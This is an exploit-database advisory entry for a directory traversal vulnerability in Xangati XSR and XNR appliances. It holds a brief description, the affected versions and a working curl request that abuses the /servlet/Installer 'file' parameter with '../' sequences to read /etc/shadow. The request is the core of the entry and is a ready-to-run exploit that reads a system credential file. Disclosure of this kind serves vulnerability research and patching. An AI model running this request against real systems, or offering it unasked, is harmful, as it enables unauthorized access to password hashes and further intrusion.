Xangati – ‘/servlet/Installer?file’ Directory Traversal

  • 作者: Jan Kadijk
    日期: 2014-04-14
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/39143/
  • source: https://www.securityfocus.com/bid/66817/info
     
    Xangati XSR And XNR are prone to a multiple directory-traversal vulnerabilities.
     
    A remote attacker could exploit these vulnerabilities using directory-traversal characters ('../') to access or read arbitrary files that contain sensitive information.
     
    Xangati XSR prior to 11 and XNR prior to 7 are vulnerable. 
    
    curl -i -s -k-X 'POST' \
    -H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25' \
    --data-binary $'key=validkey&falconConfig=getfile&file=%2Ffloodguard%2F../../../../../../../../../etc/shadow' \
    'hxxps://www.example.com/servlet/Installer'